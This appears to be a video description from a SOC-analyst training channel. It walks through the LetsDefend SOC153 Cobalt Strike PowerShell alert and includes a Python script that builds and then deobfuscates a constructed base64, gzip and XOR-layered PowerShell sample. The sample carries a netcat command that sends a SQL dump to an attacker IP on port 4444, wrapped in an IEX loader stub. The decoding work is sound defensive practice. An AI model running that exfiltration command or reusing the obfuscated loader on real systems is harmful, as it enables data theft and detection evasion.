Suspicious PowerShell — Cobalt Strike Dropper, Brute Force Entry & SQL Exfil | LetsDefend SOC153

Published: 19 May 2026
on channel: InkSec

Day 109 of Becoming a SOC Analyst — SOC153 Suspicious PowerShell Script Executed (True Positive)
endpoint.ps1 executed on the host Matt (172.31.34.35) under the Administrator account following a brute-force login from 3.16.42.241. The script contained multiple obfuscation layers: base64 and gzip encoding concealing a Cobalt Strike dropper, plus an XOR-encoded secondary payload. It performed system reconnaissance and then exfiltrated SQL database data to 3.16.42.144 over port 4444 via netcat. The attacker wiped the attack artifacts post-execution, but the full chain was reconstructed: brute force → obfuscated PS1 → Cobalt Strike staging → recon → data exfiltration confirmed. A realistic cyber attack scenario; I got two playbook paths wrong on this one and walk through the reasoning in the video.
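The layered obfuscation described above is the kind of thing an analyst peels by hand in CyberChef. As an added example (not the video's or LetsDefend's code, and not the real endpoint.ps1), the Python below constructs a three-layer sample that mimics that layering (a base64+gzip stub wrapping an inner script that XOR-decodes a second stage) and then peels it back automatically: strictly decoding long base64 runs, gunzipping anything with the gzip magic, recovering the single-byte XOR key from the script that uses it, and pulling the IP:port pair out of the final stage. The 3.16.42.144:4444 netcat destination comes from the summary; the XOR key 0x5A, the variable names, the file path and the command line are constructed.

```python
import base64
import binascii
import gzip
import re

GZIP_MAGIC = b"\x1f\x8b"
B64_RE = re.compile(r"[A-Za-z0-9+/]{32,}={0,2}")
# Single-byte XOR key declared as "$k=0x5A;" and later used as "-bxor $k".
XOR_KEY_RE = re.compile(r"\$(\w+)\s*=\s*(0x[0-9A-Fa-f]+|\d+)\s*;.*-bxor\s+\$\1", re.S)
IOC_RE = re.compile(r"\b(\d{1,3}(?:\.\d{1,3}){3})\b(?:\s+|:)(\d{2,5})\b")

XOR_KEY = 0x5A  # constructed key, not taken from the real sample
# Constructed second stage: the netcat exfil step the analysis describes.
STAGE2 = b"cmd /c nc.exe 3.16.42.144 4444 < C:\\Windows\\Temp\\sqldump.csv"


def build_sample():
    """Build a constructed three-layer PowerShell script (NOT the real endpoint.ps1):
    outer stub -> base64(gzip(inner)); inner -> base64(xor(STAGE2, XOR_KEY))."""
    xored_b64 = base64.b64encode(bytes(b ^ XOR_KEY for b in STAGE2)).decode()
    inner = (
        "$k=0x5A;$b=[Convert]::FromBase64String('" + xored_b64 + "');"
        "$p=-join($b|%{[char]($_ -bxor $k)});IEX $p"
    )
    outer_b64 = base64.b64encode(gzip.compress(inner.encode())).decode()
    return (
        "$s=New-Object IO.MemoryStream(,[Convert]::FromBase64String('" + outer_b64 + "'));"
        "IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream("
        "$s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()"
    )


def decode_b64_blobs(text):
    """Strictly decode every long base64 run; skip runs that are not valid base64."""
    blobs = []
    for m in B64_RE.finditer(text):
        try:
            blobs.append(base64.b64decode(m.group(0), validate=True))
        except (binascii.Error, ValueError):
            continue
    return blobs


def find_xor_key(text):
    """Recover a single-byte XOR key declared in the script, or None."""
    m = XOR_KEY_RE.search(text)
    if not m:
        return None
    value = m.group(2)
    return int(value, 16) if value.lower().startswith("0x") else int(value)


def peel(text, depth=0, max_depth=5):
    """Recursively strip base64 / gzip / XOR layers.
    Returns [(depth, script_text), ...] from outermost to innermost."""
    layers = [(depth, text)]
    if depth >= max_depth:
        return layers
    key = find_xor_key(text)
    for blob in decode_b64_blobs(text):
        if blob.startswith(GZIP_MAGIC):
            try:
                blob = gzip.decompress(blob)
            except (OSError, EOFError):
                continue  # gzip magic but corrupt/truncated stream
        elif key is not None:
            blob = bytes(b ^ key for b in blob)
        try:
            inner = blob.decode("utf-8")
        except UnicodeDecodeError:
            continue  # binary (e.g. a PE or shellcode): stop descending here
        layers.extend(peel(inner, depth + 1, max_depth))
    return layers


def extract_iocs(layers):
    """Collect (ip, port) pairs from every recovered layer."""
    found = set()
    for _, text in layers:
        for ip, port in IOC_RE.findall(text):
            found.add((ip, int(port)))
    return sorted(found)


if __name__ == "__main__":
    sample = build_sample()
    layers = peel(sample)
    for depth, text in layers:
        print(f"[layer {depth}] {text[:80]}{'...' if len(text) > 80 else ''}")
    print("IOCs:", extract_iocs(layers))
```

The decoder stops at the first layer that does not decode as UTF-8, which is where a real Cobalt Strike stager typically hands off to shellcode or a reflectively loaded DLL; from that point the binary blob goes to a sandbox (as with the Any.run report linked below) rather than to a text decoder. The `validate=True` on the base64 decode matters: without it, long identifiers and URLs in the stub silently decode to garbage and pollute the layer list.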

🔬 Analysis Reports
🧪 Any.run → https://any.run/report/8dfafede280614...
🦠 VirusTotal (endpoint.ps1) → https://www.virustotal.com/gui/file/e...
🦠 VirusTotal (payload) → https://www.virustotal.com/gui/file/8...

🔵 What I Cover
Threat Detection · Alert Triage · SIEM Analysis · Log Analysis · Incident Response · Blue Team Tools
🚨 Open to Work — Seeking a Level 1 SOC Analyst role in Melbourne or Remote (AU)
📂 Portfolio → inksec.io
💼 LinkedIn → linkedin.com/in/tate-pannam-8b64b23a3
If you chose the red pill... 0x74617465.sh
#SOCAnalyst #BlueTeam #Cybersecurity #CobaltStrike #PowerShell #BruteForce #DataExfiltration #Netcat #IncidentResponse #SIEM #Day109 #CyberSecurityJourney #Melbourne #LetsDefend #LetsDefendSOC #ThreatHunting #InfoSec #BlueTeamSecurity